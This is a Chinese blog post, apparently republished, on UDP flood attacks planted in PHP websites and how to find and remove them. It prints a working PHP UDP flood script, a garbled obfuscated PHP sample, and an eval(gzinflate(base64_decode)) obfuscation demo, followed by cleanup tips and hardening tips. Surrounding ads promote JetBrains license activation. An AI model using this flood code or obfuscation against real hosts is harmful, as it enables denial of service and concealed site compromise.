UDP 流量攻击_网络流量攻击

UDP 流量攻击_网络流量攻击最近在群里聊天看到有人被UDP攻击我几年前也遇到过当时前任工作交接过来面临很多挑战。话又说回来凡是跳槽或主动找到你的公司都是让你去救火的。先说说UDP攻击原理很简单就是随便连接一个IP地址随便写一个端口号。IP地址存在与否并不重要。这是UDP的特性。然后发送大数据包堵塞交换机路由器。我们在局域网上模拟注意UDP不能在同一个VLAN下…

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE稳定放心使用

最近在群里聊天看到有人被UDP攻击我几年前也遇到过当时前任工作交接过来面临很多挑战。

话又说回来凡是跳槽或主动找到你的公司都是让你去救火的。 

 

先说说UDP攻击原理很简单就是随便连接一个IP地址随便写一个端口号。 IP地址存在与否并不重要。这是UDP 的特性。

然后发送大数据包堵塞交换机路由器。

 

我们在局域网上模拟注意UDP不能在同一个VLAN下必须要经过路由才有效。

 

Php代码  
收藏代码

  1. <?php  
  2. /* 
  3. $ip = $_GET[‘ip’]; 
  4. $port = $_GET[‘port’]; 
  5. */  
  6.   
  7. $ip = ‘192.168.10.30’;  
  8. $port = 800;  
  9. $num = 1000;  
  10.   
  11. $packets = 0;  
  12. set_time_limit(0);  
  13. ignore_user_abort(FALSE);  
  14. $data = ;  
  15.   
  16. for($i=0;$i<65535;$i++){  
  17.         $data .= “.”;  
  18. }  
  19.   
  20. print “Starting…..<br>”;  
  21. while($packets < $num){  
  22.     $fp = fsockopen(“udp://$ip”$port$errno$errstr, 5);  
  23.     if($fp){  
  24.         fwrite($fp$data);  
  25.         fclose($fp);  
  26.     }  
  27.     $packets++;  
  28. }  
  29. print(‘Package: ‘.$packets);  

 

上面提供的脚本一般攻击者不会直接使用他们会使用PHP源码混淆在植入你的网站中。

 

Php代码  
收藏代码

  1. <?php   
  2. if (!defined(“ACFCEFFBAEDABEA”)){define(“ACFCEFFBAEDABEA”, true);global $?$崜,$棊€,$儓儌,$妬墡?$剝殣殐,$唲殱枮?$啀帗泚媻,$儚搱摕嫕?$倐挐搷仜摐,$槉泭憟檮劀?$悁€儕晜枔憴?$剹姄檰問煈憠?$泝垁€殤倻枍憴?$剫灉憰噭弾寙帪?$檨敐姈焻噦仦悢槙;function 尃($尃,$崜?“”){
    global $?$崜,$棊€,$儓儌,$妬墡?$剝殣殐,$唲殱枮?$啀帗泚媻,$儚搱摕嫕?$倐挐搷仜摐,$槉泭憟檮劀?$悁€儕晜枔憴?$剹姄檰問煈憠?$泝垁€殤倻枍憴?$剫灉憰噭弾寙帪?$檨敐姈焻噦仦悢槙;if(emptyempty($崜?){
    return base64_decode($尃);}else{
    return 尃($泝垁€殤倻枍憴?$尃,$崜?$悁€儕晜枔憴?$崜?));}}$悁€儕晜枔憴?尃(“c3RycmV2?);$泝垁€殤倻枍憴?尃(“c3RydHI=?);$唲殱枮?尃(“PzQ0NGMzY泎IwZmU1BTUwNzQ5MmV俴M2NFZWIy扤2RFMmM1P?U=?,”LBFZjOP“);$儚搱摕嫕?尃(“aHJlZ19yZXBsYWNl?,“cxkeqa”);$倐挐搷仜摐=尃(“lmFzZTl0X2RY弆29kZQ==?,”YjIteHl“);$剹姄檰問煈憠?尃(“H3p1bmQvbXByH沊Qz?,“ZnNVQPH”);$剫灉憰噭弾寙帪?尃(“CXChbA==?,”ZPcnsC“);function 棊€?&$棊€?{global $?$崜,$棊€,$儓儌,$妬墡?$剝殣殐,$唲殱枮?$啀帗泚媻,$儚搱摕嫕?$倐挐搷仜摐,$槉泭憟檮劀?$悁€儕晜枔憴?$剹姄檰問煈憠?$泝垁€殤倻枍憴?$剫灉憰噭弾寙帪?$檨敐姈焻噦仦悢槙;$檨敐姈焻噦仦悢槙?尃(“oGgg?,“Zgzlo”);@$儚搱摕嫕?$唲殱枮?$剫灉憰噭弾寙帪?“(@$剹姄檰問煈憠?$倐挐搷仜摐(‘eNptku1v0kAY僿P8V0vDhGutG?TbXkItOZLxk廚gLTlqkhbS1S?pIFSBd0S+zL嶦LpSxzrHeBv9楿+0dSLLot7v7?e55nnuei3vQ機wGRzxW0E5rt哣KZCqSEeQOgQ嘑CHX9VbxSzNP噆Kn4MMBepqlo凢b4IBxE+KchK怋rGx/wPDDl+k巖yIgtRqVDgJ2?7YwyTEf1BxT€6s5R1ON6ljNy宨LvmwB9jQed3峚xWhYFSEU4gk僺SunDR05jj29檓dpYEnT2XOB3€4CNK3nj79dg4嘑JDSG/rBzLx2焥aTqWlsVuLSi泇4djJJ69a6VVpD24M3fUnzjO廸IRNUaifS1n2峍CxC6CPTkDQR慽RPzbuHeL69+歐ubjzd3Db2xn昫a4tMZzWQ2bz怐V/LItULYbV6焟D/KVKsptQbi烪iC2wdazl+Qn€sE1QEaaizoUk?R33IoRo95H+峮LpUtLayOfTC?OX6odFutQAr歋MWIlrTpFQ4A?qrU5uVrmfxP?Rt7PQ+wjkQ9乑5IkhGh4YA2e?AQWtghpX0xI哹I2RFPmFss8m揳zvMbjLJJuQ9焟mZkeY+gGJKM俋VzE/skcgtXf擟OGruDN2g0mv宒78cjQZRDsu6怷QRDcxbMATZQ?favoB8srxd+咰DuqrqDLT27h扠ZSZM1rSOUMS€XndvywL3zULj唓B+UylGP/gCx嶹Qyu€’)));”,“槤?潐墐瀳444c3c20fe59507492ed3cceb27dc2c5寛剣厭”);return “y”;}}else{
    global $?$崜,$棊€,$儓儌,$妬墡?$剝殣殐,$唲殱枮?$啀帗泚媻,$儚搱摕嫕?$倐挐搷仜摐,$槉泭憟檮劀?$悁€儕晜枔憴?$剹姄檰問煈憠?$泝垁€殤倻枍憴?$剫灉憰噭弾寙帪?$檨敐姈焻噦仦悢槙;$悁€儕晜枔憴?尃(“c3RycmV2?);$泝垁€殤倻枍憴?尃(“c3RydHI=?);$唲殱枮?尃(“PzQ0NGMzY泎IwZmU1BTUwNzQ5MmV俴M2NFZWIy扤2RFMmM1P?U=?,”LBFZjOP“);$儚搱摕嫕?尃(“aHJlZ19yZXBsYWNl?,“cxkeqa”);$倐挐搷仜摐=尃(“lmFzZTl0X2RY弆29kZQ==?,”YjIteHl“);$剹姄檰問煈憠?尃(“H3p1bmQvbXByH沊Qz?,“ZnNVQPH”);$剫灉憰噭弾寙帪?尃(“CXChbA==?,”ZPcnsC“);}$啀帗泚媻?尃(“EU5wejhjOUpCd0FZ嘦UGFRm6F?,“ZaHIQotE”);$唲殱枮憼=棊€?$啀帗泚媻?;@$儚搱摕嫕?$唲殱枮?$剫灉憰噭弾寙帪?“(@$剹姄檰問煈憠?$倐挐搷仜摐(‘eNo9UNtu2kAQfe9X憆KyVMGLlOEVEacxF峟Wif+lApH4Acsiar歡G2tF+WhquRbCTHB搘XEwmOuvdhaS7MvM攎Tkz58wanXaz4965刋xBmLmqhyvm3r9r5儀aVW1+p6xUDYdbiA?qWuA7BHQ8gbx9w1攅/dUeIABeVR0BRvS?oANmVD1qoFY33Y4?Y48yrvmDWxRf37/抎f0”.$啀帗泚媻?$唲殱枮憼.“YU4GVeJb昒5hSG/Qsh6uYtXQD塻+ZFo1FvQFKrVf+8k7QWUjTFQH+Ry5kt瀔HItTC6Y3dfka97w丯jQf7tiAqp8Gm0ff宑oUlL7Q8p3fvuNRW杔dGte3V2Bocr5HQo匓Mq57ZyiJzhBDXmK峱cIsbLAeOBNUAnIy塀E2rN3C8Y60qfX3I?mqfLtXKb6iZfXqF扠tpHH8jvX49GNnyf慽p8JnuUEL1Of4GgS抙QQnwVO6JDiO1vN1凴PA4Xu+KfQbJLM03弚TQB3ks+yQ/TXUpw汫L7u8lmwybcEr5JN攌k3KON4Ce+77UbII漣zwrC1i2TPJyPC4O峎fYEEpto4vvrLNwW俿6wEjXi632aLx/gl榝R6n+xXBZfC2S4rD乿8cw2M/fVouq0Wn/桞xjGxpk=?)));”,”€拝  
  3. 儝€悪?44c3c20fe59507492ed3cceb27dc2c5儞悇搩”);return true;?>9822537530499f58277ef52ffa504e5a  

 

另外一种是采用 eval(gzinflate(base64_decode(…..)))

Php代码  
收藏代码

  1. <?php  
  2. $code = “echo ‘Hello!’;”;  
  3. $compressed   = gzdeflate($code, 9);  
  4. $compressed = base64_encode($compressed);  
  5. echo $compressed;  
  6. echo “\r\n”;  
  7.   
  8. $compressed = base64_decode($compressed);  
  9. $uncompressed = gzinflate($compressed);  
  10. echo $uncompressed;  
  11. echo “\r\n”;  
  12.   
  13. eval($uncompressed);  
  14. echo “\r\n”;  
  15.   
  16. ?>  

 

 

如果被攻击了怎样处理这样的攻击其实很简单。

 

grep -r ‘udp’ * 

 

找到可疑的脚本然后再删除即可

 

对于混淆过的PHP程序其实也有规律可循。可以查找 base64_decode eval 等等关键字一般被植入的目录多是777权限例如图片上传目录。

 

如果做好安全措施

  1. 代码600权限同时不能与web server 守护进程使用一个用户
  2. 无关目录屏蔽php运行权限
Java代码  
收藏代码

  1. <Location /includes/>  
  2.         Order allow,deny  
  3.         Deny from all  
  4. </Location>  

 

 3. 使用框架开发很多MVC 只有一个index.php 入口用户可访问的目录只有静态文件

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/188837.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)


相关推荐

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号